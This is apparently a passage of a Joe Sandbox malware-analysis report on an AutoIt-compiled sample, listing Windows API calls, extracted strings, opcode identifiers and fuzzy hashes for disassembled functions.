                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: CrackInternet_memset
                                                    • String ID: |
                                                    • API String ID: 1413715105-2343686810
                                                    • Opcode ID: dfc56387751566e8d72a9b00a1f957c515fac6b89236e3f688f94298164868e1
                                                    • Instruction ID: 2453ea5f1aab1b9a301e61ca6607f877b81759cc5883e51f58b802b6bc02ca12
                                                    • Opcode Fuzzy Hash: dfc56387751566e8d72a9b00a1f957c515fac6b89236e3f688f94298164868e1
                                                    • Instruction Fuzzy Hash: 85313C71C00119ABDF51EFA0CC85AEEBFB9FF08314F104019F815A6162EB359956EBA0
                                                    APIs
                                                    • DestroyWindow.USER32(?,?,?,?), ref: 00F7713C
                                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00F77178
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Window$DestroyMove
                                                    • String ID: static
                                                    • API String ID: 2139405536-2160076837
                                                    • Opcode ID: 6843d16e4a9b666a0bd1340c7c1a6eea54ec1ce69dd37a0c1e2cad533cec8959
                                                    • Instruction ID: a64fb6dc0cb28cf97decc0ba0dd92c1722d22a8ddcd1771a11b278c0ad659ba9
                                                    • Opcode Fuzzy Hash: 6843d16e4a9b666a0bd1340c7c1a6eea54ec1ce69dd37a0c1e2cad533cec8959
                                                    • Instruction Fuzzy Hash: D331AF71110608AEEB10AF74CC80BFB73A9FF48720F50D61AF99997190DB71AC81EB61
                                                    APIs
                                                    • _memset.LIBCMT ref: 00F530B8
                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F530F3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: InfoItemMenu_memset
                                                    • String ID: 0
                                                    • API String ID: 2223754486-4108050209
                                                    • Opcode ID: 807c6bf4918ef8074a0045081c330bf5e8aedd14b5d7cf50af17a5d724eef43c
                                                    • Instruction ID: a7d6122c2f58d59fd2fe1901c672889f1a141715a710cf0fda2b5abd8853b54d
                                                    • Opcode Fuzzy Hash: 807c6bf4918ef8074a0045081c330bf5e8aedd14b5d7cf50af17a5d724eef43c
                                                    • Instruction Fuzzy Hash: BA310931E007059BEB248F6DCD85BEEBBB8EF053E1F144019EE81A61A1D7709B48EB50
                                                    APIs
                                                    • __snwprintf.LIBCMT ref: 00F64132
                                                      • Part of subcall function 00F01A36: _memmove.LIBCMT ref: 00F01A77
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: __snwprintf_memmove
                                                    • String ID: , $$AUTOITCALLVARIABLE%d
                                                    • API String ID: 3506404897-2584243854
                                                    • Opcode ID: 96868fa0da5fddeb401afc14cfdc2273253cb0fb5cb4604513b8e792f9eecfed
                                                    • Instruction ID: f0868238309503cf85f14cbcdec9d9fe5c853877fb994f244f4716c6910f0271
                                                    • Opcode Fuzzy Hash: 96868fa0da5fddeb401afc14cfdc2273253cb0fb5cb4604513b8e792f9eecfed
                                                    • Instruction Fuzzy Hash: 81218E71A00218AFCF15EF64CC81AEE77A5BF56341F404455F905A7282DB38EA85FBA2
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00F76D86
                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F76D91
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: Combobox
                                                    • API String ID: 3850602802-2096851135
                                                    • Opcode ID: fdf0da2669653494ecb7464bebc44f363bcf6dcf9847684976c76c027c09ab2d
                                                    • Instruction ID: e59a6ff95ec5e6a0df40e07bc810023744ffae1fef64eba335435ecfea52c230
                                                    • Opcode Fuzzy Hash: fdf0da2669653494ecb7464bebc44f363bcf6dcf9847684976c76c027c09ab2d
                                                    • Instruction Fuzzy Hash: 23118671710608AFEF219F54DC81FFB3B6BEB88364F11812AF918DB290D6719C51A761
                                                    APIs
                                                      • Part of subcall function 00EF2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00EF214F
                                                      • Part of subcall function 00EF2111: GetStockObject.GDI32(00000011), ref: 00EF2163
                                                      • Part of subcall function 00EF2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00EF216D
                                                    • GetWindowRect.USER32(00000000,?), ref: 00F77296
                                                    • GetSysColor.USER32(00000012), ref: 00F772B0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                    • String ID: static
                                                    • API String ID: 1983116058-2160076837
                                                    • Opcode ID: e0399c20441d1c98ba3ff92ec15a1c93009dda94e8ffe046aabc650820826a16
                                                    • Instruction ID: 4bff3a75499f093c7ef0db82cc5673ec71aa68b8bd459f7463d1e85a9f8fd7fd
                                                    • Opcode Fuzzy Hash: e0399c20441d1c98ba3ff92ec15a1c93009dda94e8ffe046aabc650820826a16
                                                    • Instruction Fuzzy Hash: D9211A72A2420AAFDB04DFA8CC45EFA7BA8EB08314F005519FD55D3251DB35E851EB51
                                                    APIs
                                                    • GetWindowTextLengthW.USER32(00000000), ref: 00F76FC7
                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00F76FD6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: LengthMessageSendTextWindow
                                                    • String ID: edit
                                                    • API String ID: 2978978980-2167791130
                                                    • Opcode ID: c81d73231f249366e7a307a55f3515d74e7619dc4557f50386d31eee64a572eb
                                                    • Instruction ID: 883ed56a00606222be8a3a1d3b80a0a9fc40f6784caeb2f0797c655d30b92cd7
                                                    • Opcode Fuzzy Hash: c81d73231f249366e7a307a55f3515d74e7619dc4557f50386d31eee64a572eb
                                                    • Instruction Fuzzy Hash: 44116D71500608ABEB505E64EC80EFB3B6AEB45378F508715F968D71E0DB35DC50BB61
                                                    APIs
                                                    • _memset.LIBCMT ref: 00F531C9
                                                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00F531E8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: InfoItemMenu_memset
                                                    • String ID: 0
                                                    • API String ID: 2223754486-4108050209
                                                    • Opcode ID: 599071b3eb89d0152d6fa041a07196df8cd6af713fb73c5dc6d6f2b6bd99b3c5
                                                    • Instruction ID: 67b407cdb270b36e7d09b5c82ff42fa48124144caa74587e4bc147fe3d31caa8
                                                    • Opcode Fuzzy Hash: 599071b3eb89d0152d6fa041a07196df8cd6af713fb73c5dc6d6f2b6bd99b3c5
                                                    • Instruction Fuzzy Hash: F911E932D00618ABDB20DAACDC45B9D77B8AB053A2F140122EE05A7160D774EF0DEBE1
                                                    APIs
                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00F628F8
                                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00F62921
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Internet$OpenOption
                                                    • String ID: <local>
                                                    • API String ID: 942729171-4266983199
                                                    • Opcode ID: 86d3f477083eb5ae2679e57b4fde154b455853419da973d629923d95ce94af51
                                                    • Instruction ID: 2cba0be590d7185e782d6ca348be74fae50e2e4a60e914d27770f596246d1119
                                                    • Opcode Fuzzy Hash: 86d3f477083eb5ae2679e57b4fde154b455853419da973d629923d95ce94af51
                                                    • Instruction Fuzzy Hash: 6811C171901A25BAEB648B618C88EFABF68EF06361F10812BF54547100E7705954F6E0
                                                    APIs
                                                      • Part of subcall function 00F686E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00F6849D,?,00000000,?,?), ref: 00F686F7
                                                    • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00F684A0
                                                    • htons.WSOCK32(00000000,?,00000000), ref: 00F684DD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWidehtonsinet_addr
                                                    • String ID: 255.255.255.255
                                                    • API String ID: 2496851823-2422070025
                                                    • Opcode ID: 64a83de56e167d17eaf5528e2c1fffa180e37f75aaca3a4b42f1185260c3c3a0
                                                    • Instruction ID: 95b5b3a20f2ba9172cbc228417958dc6d3a8f8b31b0be06db95eda499e5cdae8
                                                    • Opcode Fuzzy Hash: 64a83de56e167d17eaf5528e2c1fffa180e37f75aaca3a4b42f1185260c3c3a0
                                                    • Instruction Fuzzy Hash: 9911C27150020AABDB10EF64CC46BEEB724FF04360F10861AE911572C2DF71A805E755
                                                    APIs
                                                      • Part of subcall function 00F01A36: _memmove.LIBCMT ref: 00F01A77
                                                      • Part of subcall function 00F4B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00F4B7BD
                                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00F49A2B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: ClassMessageNameSend_memmove
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 372448540-1403004172
                                                    • Opcode ID: 2924dd0b012f0379d7d766be555765ca53ca28b304e8e48e2ee4c62274e8eda5
                                                    • Instruction ID: 534f89803f1a0675f441b535d9ebfb7e7a729a5487de1b148685647051c37a66
                                                    • Opcode Fuzzy Hash: 2924dd0b012f0379d7d766be555765ca53ca28b304e8e48e2ee4c62274e8eda5
                                                    • Instruction Fuzzy Hash: B801F571B41125ABCB14EBA4CC51DFE7769BF52320B000609FC61532C1EF389808F650
                                                    APIs
                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00EFBC07
                                                      • Part of subcall function 00F01821: _memmove.LIBCMT ref: 00F0185B
                                                    • _wcscat.LIBCMT ref: 00F33593
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: FullNamePath_memmove_wcscat
                                                    • String ID: h
                                                    • API String ID: 257928180-3415971826
                                                    • Opcode ID: 8e0a535a2f30075f04ba51652994f5007d732720b09e02879e1ab352e1e24818
                                                    • Instruction ID: bd5800489379c895122d31c37a6a7449ebddb9bda5df2dc81f47e7320aea3069
                                                    • Opcode Fuzzy Hash: 8e0a535a2f30075f04ba51652994f5007d732720b09e02879e1ab352e1e24818
                                                    • Instruction Fuzzy Hash: 7F118231A0420C96CB45FBA4DC45EEEB7E8FF48350B1050A5BA88E7291DF7097847B51
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: __fread_nolock_memmove
                                                    • String ID: EA06
                                                    • API String ID: 1988441806-3962188686
                                                    • Opcode ID: 1d6eaf185b2a52d3dc9680ca849824a5dc5569ab68f7533b0010fda11a85654e
                                                    • Instruction ID: 9c1389f0482beffd07c262f39d3c36c072ea0f5ee682eeb6dadebb4af58913e3
                                                    • Opcode Fuzzy Hash: 1d6eaf185b2a52d3dc9680ca849824a5dc5569ab68f7533b0010fda11a85654e
                                                    • Instruction Fuzzy Hash: F901F972C04258BEDB18CBA8CC56EFE7BFC9B05311F00419AF552D2181E5B9E6089760
                                                    APIs
                                                      • Part of subcall function 00F01A36: _memmove.LIBCMT ref: 00F01A77
                                                      • Part of subcall function 00F4B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00F4B7BD
                                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 00F49923
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: ClassMessageNameSend_memmove
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 372448540-1403004172
                                                    • Opcode ID: 2cb33b8d98fc3b31c08ff75c5b1561352f0c55bc02b540945566d1a02dfb7326
                                                    • Instruction ID: dd63644c04eb52e019d096ac1994bb4c9c639264d340173df8d03ba2ebc8b993
                                                    • Opcode Fuzzy Hash: 2cb33b8d98fc3b31c08ff75c5b1561352f0c55bc02b540945566d1a02dfb7326
                                                    • Instruction Fuzzy Hash: 6B0184B6F41119ABDB24EBA0CD52EFF77A8AF15340F140119BC41632C1DA589E08B6B1
                                                    APIs
                                                      • Part of subcall function 00F01A36: _memmove.LIBCMT ref: 00F01A77
                                                      • Part of subcall function 00F4B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00F4B7BD
                                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 00F499A6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: ClassMessageNameSend_memmove
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 372448540-1403004172
                                                    • Opcode ID: 5b9e65367f5480656cbae4740f5f0dc3cf71b42b5332eb3cd667f0d73e57d796
                                                    • Instruction ID: a01707c5468cec72e12eb4e19cf8af8eeb744e97bcad0b122a85f0a254cebe3b
                                                    • Opcode Fuzzy Hash: 5b9e65367f5480656cbae4740f5f0dc3cf71b42b5332eb3cd667f0d73e57d796
                                                    • Instruction Fuzzy Hash: CE01DBB2F45119BBDB14EBA4CE52EFF77ACAF11340F140019BC45632C1DA588E08B672
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: ClassName_wcscmp
                                                    • String ID: #32770
                                                    • API String ID: 2292705959-463685578
                                                    • Opcode ID: 3a260f01e0112630d28136f47bed7ea0bc3eb7771e3497c63a8d55be8bb8ab57
                                                    • Instruction ID: fca472333bd6095c2bb931b67889304580e785e67ea446c3075ab7b25d325f75
                                                    • Opcode Fuzzy Hash: 3a260f01e0112630d28136f47bed7ea0bc3eb7771e3497c63a8d55be8bb8ab57
                                                    • Instruction Fuzzy Hash: 44E0617250022C17D720A659AC49FEBFBECDF45771F000017FD04D3051E960E94587D0
                                                    APIs
                                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00F488A0
                                                      • Part of subcall function 00F13588: _doexit.LIBCMT ref: 00F13592
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Message_doexit
                                                    • String ID: AutoIt$Error allocating memory.
                                                    • API String ID: 1993061046-4017498283
                                                    • Opcode ID: 1045b30042b6057c563d38529c060574eaf099a5bc1489e716475deffea91cda
                                                    • Instruction ID: 7196cc938b45f162041d446108fe9a2c53e599d36f502976bbe9a585bf27ade9
                                                    • Opcode Fuzzy Hash: 1045b30042b6057c563d38529c060574eaf099a5bc1489e716475deffea91cda
                                                    • Instruction Fuzzy Hash: CFD02B7138531832C25032A46D0BFDA7F488F09B61F000026FF08650C38DDAD5C0B2D6
                                                    APIs
                                                      • Part of subcall function 00F2B544: _memset.LIBCMT ref: 00F2B551
                                                      • Part of subcall function 00F10B74: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00F2B520,?,?,?,00EF100A), ref: 00F10B79
                                                    • IsDebuggerPresent.KERNEL32(?,?,?,00EF100A), ref: 00F2B524
                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00EF100A), ref: 00F2B533
                                                    Strings
                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00F2B52E
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                    • API String ID: 3158253471-631824599
